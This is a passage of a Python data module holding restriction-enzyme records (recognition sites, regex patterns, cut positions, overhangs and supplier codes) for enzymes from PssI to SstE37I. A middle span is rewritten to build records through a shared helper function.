'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'GNC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGGNCCY',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PssI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CNYACAC'),
'compsite': '(?=(?P<Pst14472I>C.[CT]ACAC))|(?=(?P<Pst14472I_as>GTGT[AG].G))',
'dna': None,
'freq': 2048.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CNYACAC',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Pst14472I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CTAMRAG'),
'compsite': '(?=(?P<Pst145I>CTA[AC][AG]AG))|(?=(?P<Pst145I_as>CT[CT][GT]TAG))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTAMRAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Pst145I'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GATCGAG'),
'compsite': '(?=(?P<Pst273I>GATCGAG))|(?=(?P<Pst273I_as>CTCGATC))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GATCGAG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Pst273I'] = _temp()
def _temp():
return {
'charac': (5, -5, None, None, 'CTGCAG'),
'compsite': '(?=(?P<PstI>CTGCAG))',
'dna': None,
'freq': 4096.0,
'fst3': -5,
'fst5': 5,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'TGCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTGCAG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X'),
}
rest_dict['PstI'] = _temp()
def _temp():
return {
'charac': (6, -6, None, None, 'CAGNNNCTG'),
'compsite': '(?=(?P<PstNI>CAG...CTG))',
'dna': None,
'freq': 4096.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 3,
'ovhgseq': 'NNN',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAGNNNCTG',
'size': 9,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['PstNI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'BBCGD'),
'compsite': '(?=(?P<PsuGI>[CGT][CGT]CG[AGT]))|(?=(?P<PsuGI_as>[ACT]CG[ACG][ACG]))',
'dna': None,
'freq': 37.925925925925924,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'BBCGD',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['PsuGI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'RGATCY'),
'compsite': '(?=(?P<PsuI>[AG]GATC[CT]))',
'dna': None,
'freq': 1024.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GATC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'RGATCY',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['PsuI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'GACNNNGTC'),
'compsite': '(?=(?P<PsyI>GAC...GTC))',
'dna': None,
'freq': 4096.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -1,
'ovhgseq': 'N',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GACNNNGTC',
'size': 9,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['PsyI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GCGCGC'),
'compsite': '(?=(?P<PteI>GCGCGC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'CGCG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GCGCGC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['PteI'] = _temp()
def _temp():
return {
'charac': (4, -4, None, None, 'CGATCG'),
'compsite': '(?=(?P<PvuI>CGATCG))',
'dna': None,
'freq': 4096.0,
'fst3': -4,
'fst5': 4,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 2,
'ovhgseq': 'AT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGATCG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'X'),
}
rest_dict['PvuI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'CAGCTG'),
'compsite': '(?=(?P<PvuII>CAGCTG))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CAGCTG',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X'),
}
rest_dict['PvuII'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CACGAGH'),
'compsite': '(?=(?P<Rba2021I>CACGAG[ACT]))|(?=(?P<Rba2021I_as>[AGT]CTCGTG))',
'dna': None,
'freq': 5461.333333333333,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CACGAGH',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Rba2021I'] = _temp()
# Restriction-enzyme records (generated REBASE-style data), RceI .. Sse232I.
# Every record in this span shares the same fixed schema, so the repeated
# per-record dict literal is factored into one parametrized builder. The
# helper keeps the original throwaway name `_temp` so the module namespace
# is touched exactly as before (only `_temp` and `rest_dict`).
# Two invariants hold for every record below and are used to derive fields:
#   charac == (fst5, fst3, scd5, scd3, site)   and   size == len(site)
def _temp(compsite, freq, fst3, fst5, ovhg, ovhgseq, scd3, scd5, site, suppl):
    # Build one enzyme record; constant fields match the generated originals.
    return {
        'charac': (fst5, fst3, scd5, scd3, site),
        'compsite': compsite,
        'dna': None,
        'freq': freq,
        'fst3': fst3,
        'fst5': fst5,
        'inact_temp': 65,
        'opt_temp': 37,
        'ovhg': ovhg,
        'ovhgseq': ovhgseq,
        'results': None,
        'scd3': scd3,
        'scd5': scd5,
        'site': site,
        'size': len(site),
        'substrat': 'DNA',
        'suppl': suppl,
    }

# Args: compsite, freq, fst3, fst5, ovhg, ovhgseq, scd3, scd5, site, suppl
rest_dict['RceI'] = _temp('(?=(?P<RceI>CATCGAC))|(?=(?P<RceI_as>GTCGATG))', 16384.0, 18, 27, 2, 'NN', None, None, 'CATCGAC', ())
rest_dict['RdeGBI'] = _temp('(?=(?P<RdeGBI>CCGCAG))|(?=(?P<RdeGBI_as>CTGCGG))', 4096.0, None, None, None, None, None, None, 'CCGCAG', ())
rest_dict['RdeGBII'] = _temp('(?=(?P<RdeGBII>ACCCAG))|(?=(?P<RdeGBII_as>CTGGGT))', 4096.0, 18, 26, 2, 'NN', None, None, 'ACCCAG', ())
rest_dict['RdeGBIII'] = _temp('(?=(?P<RdeGBIII>TG[AG][CT]CA))', 1024.0, -17, -9, 2, 'NN', 9, 17, 'TGRYCA', ())
rest_dict['RflFIII'] = _temp('(?=(?P<RflFIII>CGCCAG))|(?=(?P<RflFIII_as>CTGGCG))', 4096.0, None, None, None, None, None, None, 'CGCCAG', ())
rest_dict['RgaI'] = _temp('(?=(?P<RgaI>GCGATCGC))', 65536.0, -5, 5, 2, 'AT', None, None, 'GCGATCGC', ('I',))
rest_dict['RigI'] = _temp('(?=(?P<RigI>GGCCGGCC))', 65536.0, -6, 6, 4, 'CCGG', None, None, 'GGCCGGCC', ('I',))
rest_dict['RlaI'] = _temp('(?=(?P<RlaI>[ACG]C[AT]))|(?=(?P<RlaI_as>[AT]G[CGT]))', 10.666666666666666, None, None, None, None, None, None, 'VCW', ())
rest_dict['RlaII'] = _temp('(?=(?P<RlaII>ACACAG))|(?=(?P<RlaII_as>CTGTGT))', 4096.0, 18, 26, 2, 'NN', None, None, 'ACACAG', ())
rest_dict['RleAI'] = _temp('(?=(?P<RleAI>CCCACA))|(?=(?P<RleAI_as>TGTGGG))', 4096.0, 9, 18, 3, 'NNN', None, None, 'CCCACA', ())
rest_dict['Rmu369III'] = _temp('(?=(?P<Rmu369III>GGC[CT]AC))|(?=(?P<Rmu369III_as>GT[AG]GCC))', 2048.0, None, None, None, None, None, None, 'GGCYAC', ())
rest_dict['RpaB5I'] = _temp('(?=(?P<RpaB5I>CG[AG]GGAC))|(?=(?P<RpaB5I_as>GTCC[CT]CG))', 8192.0, 18, 27, 2, 'NN', None, None, 'CGRGGAC', ())
rest_dict['RpaBI'] = _temp('(?=(?P<RpaBI>CCCGCAG))|(?=(?P<RpaBI_as>CTGCGGG))', 16384.0, 18, 27, 2, 'NN', None, None, 'CCCGCAG', ())
rest_dict['RpaI'] = _temp('(?=(?P<RpaI>GT[CT]GGAG))|(?=(?P<RpaI_as>CTCC[AG]AC))', 8192.0, 9, 18, 2, 'NN', None, None, 'GTYGGAG', ())
rest_dict['RpaTI'] = _temp('(?=(?P<RpaTI>G[AG]TGGAG))|(?=(?P<RpaTI_as>CTCCA[CT]C))', 8192.0, None, None, None, None, None, None, 'GRTGGAG', ())
rest_dict['RruI'] = _temp('(?=(?P<RruI>TCGCGA))', 4096.0, -3, 3, 0, '', None, None, 'TCGCGA', ('B',))
rest_dict['RsaI'] = _temp('(?=(?P<RsaI>GTAC))', 256.0, -2, 2, 0, '', None, None, 'GTAC', ('B', 'C', 'I', 'J', 'M', 'N', 'Q', 'R', 'S', 'V', 'X', 'Y'))
rest_dict['RsaNI'] = _temp('(?=(?P<RsaNI>GTAC))', 256.0, -1, 1, -2, 'TA', None, None, 'GTAC', ('I',))
rest_dict['RseI'] = _temp('(?=(?P<RseI>CA[CT]....[AG]TG))', 1024.0, -5, 5, 0, '', None, None, 'CAYNNNNRTG', ('B',))
rest_dict['Rsp008IV'] = _temp('(?=(?P<Rsp008IV>ACGCAG))|(?=(?P<Rsp008IV_as>CTGCGT))', 4096.0, None, None, None, None, None, None, 'ACGCAG', ())
rest_dict['Rsp008V'] = _temp('(?=(?P<Rsp008V>GCCCAT))|(?=(?P<Rsp008V_as>ATGGGC))', 4096.0, None, None, None, None, None, None, 'GCCCAT', ())
rest_dict['Rsp531II'] = _temp('(?=(?P<Rsp531II>CACACG))|(?=(?P<Rsp531II_as>CGTGTG))', 4096.0, None, None, None, None, None, None, 'CACACG', ())
rest_dict['RspPBTS2III'] = _temp('(?=(?P<RspPBTS2III>CTTCGAG))|(?=(?P<RspPBTS2III_as>CTCGAAG))', 16384.0, None, None, None, None, None, None, 'CTTCGAG', ())
rest_dict['Rsr2I'] = _temp('(?=(?P<Rsr2I>CGG[AT]CCG))', 8192.0, -2, 2, -3, 'GWC', None, None, 'CGGWCCG', ('I', 'V'))
rest_dict['RsrII'] = _temp('(?=(?P<RsrII>CGG[AT]CCG))', 8192.0, -2, 2, -3, 'GWC', None, None, 'CGGWCCG', ('N', 'Q', 'X'))
rest_dict['Rtr1953I'] = _temp('(?=(?P<Rtr1953I>TGA......TGA))|(?=(?P<Rtr1953I_as>TCA......TCA))', 4096.0, None, None, None, None, None, None, 'TGANNNNNNTGA', ())
rest_dict['SacI'] = _temp('(?=(?P<SacI>GAGCTC))', 4096.0, -5, 5, 4, 'AGCT', None, None, 'GAGCTC', ('B', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'X'))
rest_dict['SacII'] = _temp('(?=(?P<SacII>CCGCGG))', 4096.0, -4, 4, 2, 'GC', None, None, 'CCGCGG', ('B', 'J', 'K', 'N', 'O', 'Q', 'R', 'X'))
rest_dict['Saf8902III'] = _temp('(?=(?P<Saf8902III>CAAT.AG))|(?=(?P<Saf8902III_as>CT.ATTG))', 4096.0, None, None, None, None, None, None, 'CAATNAG', ())
rest_dict['Sag901I'] = _temp('(?=(?P<Sag901I>GCAAAT))|(?=(?P<Sag901I_as>ATTTGC))', 4096.0, None, None, None, None, None, None, 'GCAAAT', ())
rest_dict['SalI'] = _temp('(?=(?P<SalI>GTCGAC))', 4096.0, -1, 1, -4, 'TCGA', None, None, 'GTCGAC', ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X'))
rest_dict['SanDI'] = _temp('(?=(?P<SanDI>GGG[AT]CCC))', 8192.0, -2, 2, -3, 'GWC', None, None, 'GGGWCCC', ())
rest_dict['SapI'] = _temp('(?=(?P<SapI>GCTCTTC))|(?=(?P<SapI_as>GAAGAGC))', 16384.0, 4, 8, -3, 'NNN', None, None, 'GCTCTTC', ('N',))
rest_dict['SaqAI'] = _temp('(?=(?P<SaqAI>TTAA))', 256.0, -1, 1, -2, 'TA', None, None, 'TTAA', ('B',))
rest_dict['SatI'] = _temp('(?=(?P<SatI>GC.GC))', 256.0, -2, 2, -1, 'N', None, None, 'GCNGC', ('B',))
rest_dict['Sau3AI'] = _temp('(?=(?P<Sau3AI>GATC))', 256.0, 0, 0, -4, 'GATC', None, None, 'GATC', ('C', 'J', 'K', 'M', 'N', 'R', 'X'))
rest_dict['Sau96I'] = _temp('(?=(?P<Sau96I>GG.CC))', 256.0, -1, 1, -3, 'GNC', None, None, 'GGNCC', ('J', 'N'))
rest_dict['SauI'] = _temp('(?=(?P<SauI>CCT.AGG))', 4096.0, -2, 2, -3, 'TNA', None, None, 'CCTNAGG', ())
rest_dict['Sba460II'] = _temp('(?=(?P<Sba460II>GG.GA[CT]G))|(?=(?P<Sba460II_as>C[AG]TC.CC))', 2048.0, None, None, None, None, None, None, 'GGNGAYG', ())
rest_dict['SbfI'] = _temp('(?=(?P<SbfI>CCTGCAGG))', 65536.0, -6, 6, 4, 'TGCA', None, None, 'CCTGCAGG', ('I', 'N', 'V'))
rest_dict['Sbo46I'] = _temp('(?=(?P<Sbo46I>TGAAC))|(?=(?P<Sbo46I_as>GTTCA))', 1024.0, None, None, None, None, None, None, 'TGAAC', ())
rest_dict['ScaI'] = _temp('(?=(?P<ScaI>AGTACT))', 4096.0, -3, 3, 0, '', None, None, 'AGTACT', ('B', 'C', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'X'))
rest_dict['SchI'] = _temp('(?=(?P<SchI>GAGTC))|(?=(?P<SchI_as>GACTC))', 1024.0, 5, 10, 0, '', None, None, 'GAGTC', ('B',))
rest_dict['SciI'] = _temp('(?=(?P<SciI>CTCGAG))', 4096.0, -3, 3, 0, '', None, None, 'CTCGAG', ())
rest_dict['ScoDS2II'] = _temp('(?=(?P<ScoDS2II>GCTAAT))|(?=(?P<ScoDS2II_as>ATTAGC))', 4096.0, None, None, None, None, None, None, 'GCTAAT', ())
rest_dict['ScrFI'] = _temp('(?=(?P<ScrFI>CC.GG))', 256.0, -2, 2, -1, 'N', None, None, 'CCNGG', ('J', 'N'))
rest_dict['SdaI'] = _temp('(?=(?P<SdaI>CCTGCAGG))', 65536.0, -6, 6, 4, 'TGCA', None, None, 'CCTGCAGG', ('B',))
rest_dict['SdeAI'] = _temp('(?=(?P<SdeAI>CAG[AG]AG))|(?=(?P<SdeAI_as>CT[CT]CTG))', 2048.0, 19, 27, 2, 'NN', None, None, 'CAGRAG', ())
rest_dict['SdeOSI'] = _temp('(?=(?P<SdeOSI>GAC....[AG]TGA))|(?=(?P<SdeOSI_as>TCA[CT]....GTC))', 8192.0, -24, -11, 2, 'NN', 10, 23, 'GACNNNNRTGA', ())
rest_dict['SduI'] = _temp('(?=(?P<SduI>G[AGT]GC[ACT]C))', 455.1111111111111, -5, 5, 4, 'DGCH', None, None, 'GDGCHC', ('B',))
rest_dict['SecI'] = _temp('(?=(?P<SecI>CC..GG))', 256.0, -1, 1, -4, 'CNNG', None, None, 'CCNNGG', ())
rest_dict['SelI'] = _temp('(?=(?P<SelI>CGCG))', 256.0, 0, 0, -4, 'CGCG', None, None, 'CGCG', ())
rest_dict['Sen17963III'] = _temp('(?=(?P<Sen17963III>CCAAAC))|(?=(?P<Sen17963III_as>GTTTGG))', 4096.0, None, None, None, None, None, None, 'CCAAAC', ())
rest_dict['SenA1673III'] = _temp('(?=(?P<SenA1673III>G.GGCAG))|(?=(?P<SenA1673III_as>CTGCC.C))', 4096.0, None, None, None, None, None, None, 'GNGGCAG', ())
rest_dict['SenSARA26III'] = _temp('(?=(?P<SenSARA26III>AC[AG]CAG))|(?=(?P<SenSARA26III_as>CTG[CT]GT))', 2048.0, None, None, None, None, None, None, 'ACRCAG', ())
rest_dict['SenTFIV'] = _temp('(?=(?P<SenTFIV>GATCAG))|(?=(?P<SenTFIV_as>CTGATC))', 4096.0, None, None, None, None, None, None, 'GATCAG', ())
rest_dict['SetI'] = _temp('(?=(?P<SetI>A[CG][CG]T))', 64.0, -4, 4, 4, 'ASST', None, None, 'ASST', ('I',))
rest_dict['SexAI'] = _temp('(?=(?P<SexAI>ACC[AT]GGT))', 8192.0, -1, 1, -5, 'CCWGG', None, None, 'ACCWGGT', ('M', 'N'))
rest_dict['SfaAI'] = _temp('(?=(?P<SfaAI>GCGATCGC))', 65536.0, -5, 5, 2, 'AT', None, None, 'GCGATCGC', ('B',))
rest_dict['SfaNI'] = _temp('(?=(?P<SfaNI>GCATC))|(?=(?P<SfaNI_as>GATGC))', 1024.0, 9, 10, -4, 'NNNN', None, None, 'GCATC', ('I', 'N', 'V'))
rest_dict['SfcI'] = _temp('(?=(?P<SfcI>CT[AG][CT]AG))', 1024.0, -1, 1, -4, 'TRYA', None, None, 'CTRYAG', ('N',))
rest_dict['SfeI'] = _temp('(?=(?P<SfeI>CT[AG][CT]AG))', 1024.0, -1, 1, -4, 'TRYA', None, None, 'CTRYAG', ())
rest_dict['SfiI'] = _temp('(?=(?P<SfiI>GGCC.....GGCC))', 65536.0, -8, 8, 3, 'NNN', None, None, 'GGCCNNNNNGGCC', ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X'))
rest_dict['SfoI'] = _temp('(?=(?P<SfoI>GGCGCC))', 4096.0, -3, 3, 0, '', None, None, 'GGCGCC', ('N',))
rest_dict['Sfr274I'] = _temp('(?=(?P<Sfr274I>CTCGAG))', 4096.0, -1, 1, -4, 'TCGA', None, None, 'CTCGAG', ('I', 'V'))
rest_dict['Sfr303I'] = _temp('(?=(?P<Sfr303I>CCGCGG))', 4096.0, -4, 4, 2, 'GC', None, None, 'CCGCGG', ('I', 'V'))
rest_dict['SfuI'] = _temp('(?=(?P<SfuI>TTCGAA))', 4096.0, -2, 2, -2, 'CG', None, None, 'TTCGAA', ('M', 'S'))
rest_dict['SgeI'] = _temp('(?=(?P<SgeI>C..G))', 16.0, 13, 13, -4, 'NNNN', None, None, 'CNNG', ('B',))
rest_dict['SgfI'] = _temp('(?=(?P<SgfI>GCGATCGC))', 65536.0, -5, 5, 2, 'AT', None, None, 'GCGATCGC', ('R',))
rest_dict['SgrAI'] = _temp('(?=(?P<SgrAI>C[AG]CCGG[CT]G))', 16384.0, -2, 2, -4, 'CCGG', None, None, 'CRCCGGYG', ('N',))
rest_dict['SgrBI'] = _temp('(?=(?P<SgrBI>CCGCGG))', 4096.0, -4, 4, 2, 'GC', None, None, 'CCGCGG', ('C',))
rest_dict['SgrDI'] = _temp('(?=(?P<SgrDI>CGTCGACG))', 65536.0, -2, 2, -4, 'TCGA', None, None, 'CGTCGACG', ('B',))
rest_dict['SgrTI'] = _temp('(?=(?P<SgrTI>CC[AGT][CG]))|(?=(?P<SgrTI_as>[CG][ACT]GG))', 42.666666666666664, 14, 14, -4, 'NNNN', None, None, 'CCDS', ())
rest_dict['SgsI'] = _temp('(?=(?P<SgsI>GGCGCGCC))', 65536.0, -2, 2, -4, 'CGCG', None, None, 'GGCGCGCC', ('B',))
rest_dict['SimI'] = _temp('(?=(?P<SimI>GGGTC))|(?=(?P<SimI_as>GACCC))', 1024.0, 0, 2, -3, 'GTC', None, None, 'GGGTC', ())
rest_dict['SinI'] = _temp('(?=(?P<SinI>GG[AT]CC))', 512.0, -1, 1, -3, 'GWC', None, None, 'GGWCC', ('X',))
rest_dict['SlaI'] = _temp('(?=(?P<SlaI>CTCGAG))', 4096.0, -1, 1, -4, 'TCGA', None, None, 'CTCGAG', ('C', 'Y'))
rest_dict['SmaI'] = _temp('(?=(?P<SmaI>CCCGGG))', 4096.0, -3, 3, 0, '', None, None, 'CCCGGG', ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X', 'Y'))
rest_dict['SmaUMH5I'] = _temp('(?=(?P<SmaUMH5I>CTTGAC))|(?=(?P<SmaUMH5I_as>GTCAAG))', 4096.0, None, None, None, None, None, None, 'CTTGAC', ())
rest_dict['SmaUMH8I'] = _temp('(?=(?P<SmaUMH8I>GCGAAC[CGT]))|(?=(?P<SmaUMH8I_as>[ACG]GTTCGC))', 5461.333333333333, None, None, None, None, None, None, 'GCGAACB', ())
rest_dict['SmiI'] = _temp('(?=(?P<SmiI>ATTTAAAT))', 65536.0, -4, 4, 0, '', None, None, 'ATTTAAAT', ('B', 'I', 'K', 'V'))
rest_dict['SmiMI'] = _temp('(?=(?P<SmiMI>CA[CT]....[AG]TG))', 1024.0, -5, 5, 0, '', None, None, 'CAYNNNNRTG', ('I', 'V'))
rest_dict['SmlI'] = _temp('(?=(?P<SmlI>CT[CT][AG]AG))', 1024.0, -1, 1, -4, 'TYRA', None, None, 'CTYRAG', ('N',))
rest_dict['SmoI'] = _temp('(?=(?P<SmoI>CT[CT][AG]AG))', 1024.0, -1, 1, -4, 'TYRA', None, None, 'CTYRAG', ('B',))
rest_dict['SnaBI'] = _temp('(?=(?P<SnaBI>TACGTA))', 4096.0, -3, 3, 0, '', None, None, 'TACGTA', ('C', 'K', 'M', 'N', 'R'))
rest_dict['SnaI'] = _temp('(?=(?P<SnaI>GTATAC))', 4096.0, None, None, None, None, None, None, 'GTATAC', ())
rest_dict['Sno506I'] = _temp('(?=(?P<Sno506I>GGCCGAG))|(?=(?P<Sno506I_as>CTCGGCC))', 16384.0, None, None, None, None, None, None, 'GGCCGAG', ())
rest_dict['SpeI'] = _temp('(?=(?P<SpeI>ACTAGT))', 4096.0, -1, 1, -4, 'CTAG', None, None, 'ACTAGT', ('B', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'X'))
rest_dict['SphI'] = _temp('(?=(?P<SphI>GCATGC))', 4096.0, -5, 5, 4, 'CATG', None, None, 'GCATGC', ('B', 'C', 'I', 'J', 'K', 'M', 'N', 'O', 'Q', 'R', 'S', 'V', 'X'))
rest_dict['SplI'] = _temp('(?=(?P<SplI>CGTACG))', 4096.0, -1, 1, -4, 'GTAC', None, None, 'CGTACG', ())
rest_dict['SpnRII'] = _temp('(?=(?P<SpnRII>TCGAG))|(?=(?P<SpnRII_as>CTCGA))', 1024.0, None, None, None, None, None, None, 'TCGAG', ())
rest_dict['SpoDI'] = _temp('(?=(?P<SpoDI>GCGG[AG]AG))|(?=(?P<SpoDI_as>CT[CT]CCGC))', 8192.0, None, None, None, None, None, None, 'GCGGRAG', ())
rest_dict['SrfI'] = _temp('(?=(?P<SrfI>GCCCGGGC))', 65536.0, -4, 4, 0, '', None, None, 'GCCCGGGC', ('N',))
rest_dict['Sse232I'] = _temp('(?=(?P<Sse232I>CGCCGGCG))', 65536.0, -2, 2, -4, 'CCGG', None, None, 'CGCCGGCG', ())
def _temp():
return {
'charac': (6, -6, None, None, 'CCTGCAGG'),
'compsite': '(?=(?P<Sse8387I>CCTGCAGG))',
'dna': None,
'freq': 65536.0,
'fst3': -6,
'fst5': 6,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 4,
'ovhgseq': 'TGCA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCTGCAGG',
'size': 8,
'substrat': 'DNA',
'suppl': ('K',),
}
rest_dict['Sse8387I'] = _temp()
def _temp():
return {
'charac': (2, -2, None, None, 'AGGWCCT'),
'compsite': '(?=(?P<Sse8647I>AGG[AT]CCT))',
'dna': None,
'freq': 8192.0,
'fst3': -2,
'fst5': 2,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -3,
'ovhgseq': 'GWC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGGWCCT',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Sse8647I'] = _temp()
def _temp():
return {
'charac': (0, 0, None, None, 'AATT'),
'compsite': '(?=(?P<Sse9I>AATT))',
'dna': None,
'freq': 256.0,
'fst3': 0,
'fst5': 0,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'AATT',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AATT',
'size': 4,
'substrat': 'DNA',
'suppl': ('I', 'V'),
}
rest_dict['Sse9I'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'AGGCCT'),
'compsite': '(?=(?P<SseBI>AGGCCT))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AGGCCT',
'size': 6,
'substrat': 'DNA',
'suppl': ('C',),
}
rest_dict['SseBI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CCGC'),
'compsite': '(?=(?P<SsiI>CCGC))|(?=(?P<SsiI_as>GCGG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'CG',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CCGC',
'size': 4,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['SsiI'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'GAAGGC'),
'compsite': '(?=(?P<Ssp6803IV>GAAGGC))|(?=(?P<Ssp6803IV_as>GCCTTC))',
'dna': None,
'freq': 4096.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'GAAGGC',
'size': 6,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Ssp6803IV'] = _temp()
def _temp():
return {
'charac': (None, None, None, None, 'CGCAGCG'),
'compsite': '(?=(?P<Ssp714II>CGCAGCG))|(?=(?P<Ssp714II_as>CGCTGCG))',
'dna': None,
'freq': 16384.0,
'fst3': None,
'fst5': None,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': None,
'ovhgseq': None,
'results': None,
'scd3': None,
'scd5': None,
'site': 'CGCAGCG',
'size': 7,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['Ssp714II'] = _temp()
def _temp():
return {
'charac': (13, 8, None, None, 'GGTGA'),
'compsite': '(?=(?P<SspD5I>GGTGA))|(?=(?P<SspD5I_as>TCACC))',
'dna': None,
'freq': 1024.0,
'fst3': 8,
'fst5': 13,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGTGA',
'size': 5,
'substrat': 'DNA',
'suppl': (),
}
rest_dict['SspD5I'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'GGCGCC'),
'compsite': '(?=(?P<SspDI>GGCGCC))',
'dna': None,
'freq': 4096.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -4,
'ovhgseq': 'GCGC',
'results': None,
'scd3': None,
'scd5': None,
'site': 'GGCGCC',
'size': 6,
'substrat': 'DNA',
'suppl': ('B',),
}
rest_dict['SspDI'] = _temp()
def _temp():
return {
'charac': (3, -3, None, None, 'AATATT'),
'compsite': '(?=(?P<SspI>AATATT))',
'dna': None,
'freq': 4096.0,
'fst3': -3,
'fst5': 3,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': 0,
'ovhgseq': '',
'results': None,
'scd3': None,
'scd5': None,
'site': 'AATATT',
'size': 6,
'substrat': 'DNA',
'suppl': ('B', 'C', 'I', 'J', 'K', 'N', 'Q', 'R', 'V', 'X'),
}
rest_dict['SspI'] = _temp()
def _temp():
return {
'charac': (1, -1, None, None, 'CTAG'),
'compsite': '(?=(?P<SspMI>CTAG))',
'dna': None,
'freq': 256.0,
'fst3': -1,
'fst5': 1,
'inact_temp': 65,
'opt_temp': 37,
'ovhg': -2,
'ovhgseq': 'TA',
'results': None,
'scd3': None,
'scd5': None,
'site': 'CTAG',
'size': 4,
'substrat': 'DNA',
'suppl': ('I',),
}
rest_dict['SspMI'] = _temp()
def _temp():
return {
'charac': (27, 18, None, None, 'CGAAGAC'),
'compsite': '(?=(?P<SstE37I>CGAAGAC))|(?=(?P<SstE37I_as>GTCTTCG))',
'dna': None,
'freq': 16384.0,
'fst3': 18,
'fst5': 27,
